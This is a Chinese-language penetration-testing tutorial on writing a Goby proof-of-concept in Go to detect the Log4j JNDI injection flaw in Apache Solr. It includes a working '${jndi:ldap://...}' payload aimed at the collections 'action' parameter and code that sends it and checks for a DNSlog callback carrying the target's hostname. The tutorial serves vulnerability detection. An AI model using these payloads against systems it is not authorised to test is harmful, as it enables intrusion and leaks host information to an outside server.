网络安全渗透测试使用goby检测log4j漏洞

一、前言

前段时间的log4j漏洞影响很广泛，网上已经公开了很多地方的利用方式，而平时用goby较多，就想利用goby的指纹识别对目标定向检测。这篇文章就从apache solr log4j漏洞为例，教大家如何写goby poc，文章中有错误还请及时指正。

goby可以通过编写go文件，来实现一些高级的漏洞检测或利用，例如dnslog检测漏洞

详情可查阅goby官方文档：https://cn.gobies.org/docs/exp/index.html

二、漏洞复现

首先了解到漏洞触发点是action参数，

/solr/admin/collections?action=

通过dnslog验证到靶机是存在漏洞。

payload：${jndi:ldap://24x44x.dnslog.cn/a}

图一：发送payload

图二：dnslog有回显

三、goby poc编写

goby是通过golang编写的，而一些漏洞检测场景（比如dnslog验证），goby自身的json 格式无法满足这一需求，需采用 golang 编写漏洞代码。

expjson部分

1、首先通过goby poc管理，添加poc，按照goby官方漏洞描述模版说明填写并保存。

图三：自定义poc

2、在goby安装目录的\golib\exploits\user文件夹打开生成的apache_solr_log4j_jndi_rce.json文件，如果不需要exp则需把hasexp字段的true改为false。

图四：生成的json文件

3、将生成的json代码（去掉外围大括号）复制到goby漏洞检测golang模板的expjson := {xxx}中。

package exploits

import (
//根据需求导入相应的包
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/godclient"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
"time"
)
func init() {
expjson := `{
expjson部分
}`
expmanager.addexploit(newexploit(
goutils.getfilename(),
expjson,
nil, //自定义poc函数部分。
nil, //自定义exp函数, 没有exp，就写nil,
))
}

goby漏洞检测golang模板

自定义poc函数部分

1、根据官方文档说明

自定义 poc 由一个函数构成，该函数参数分为

jsonvul.jsonvul、httpclient.fixurl、scanconfig.singlescanconfig 结构体组成，通过响应 bool 来确认漏洞是否存在。函数模版如下：

func(exp *jsonvul.jsonvul, u *httpclient.fixurl, ss *scanconfig.singlescanconfig) bool {
return false
}

需要通过编写检测漏洞是否存在的golang代码，检测到漏洞存在则返回true，不存在返回false。

图五：自定义 poc函数部分

checkstr := goutils.randomhexstring(4)

randomhexstring函数：随机生成指定长度的字符串

checkurl, isdomain := godclient.getgodcheckurl(checkstr)

getgodcheckurl函数：生成dnslog地址

uri := "/solr/admin/collections?action=$%7bjndi:ldap://$%7bhostname%7d." + checkurl + "/a%7d"

漏洞触发点拼接payload

cfg := httpclient.newgetrequestconfig(uri) //newgetrequestconfig：构建get请求自定义配置，返回requestconfig
cfg.verifytls = false //忽略ssl验证
cfg.followredirect = false //不跟随跳转
cfg.header.store("content-type", "application/x-www-form-urlencoded") //自定义请求头
httpclient.dohttprequest(u, cfg) //dohttprequest：构建自定义请求配置，发送请求，返回请求结果httpresponse

构建并发送自定义配置的get请求，返回请求结果httpresponse

图六：通过代理抓取到goby发送payload的get请求

return godclient.pullexists(checkstr, time.second*15)

在一段时间内检测dnslog是否有http请求成功，如果成功返回true，否则返回false。

图七：通过代理抓取到goby检测dnslog是否有http请求成功

图八：漏洞检测成功

注意点：

• 1、expjson部分gobyquery查询规则，要保证能匹配到对应目录资产
• 2、导入goby，发现加载不出poc，需要去检查代码的问题
• 3、使用goby官方的函数需通过import导入对应的包

当然除了solr还有很多框架，希望大家能从文章中学到一点知识，打磨自己的武器。

以上就是网络安全渗透测试使用goby检测log4j漏洞的详细内容，更多关于使用goby检测log4j漏洞的资料请关注其它相关文章！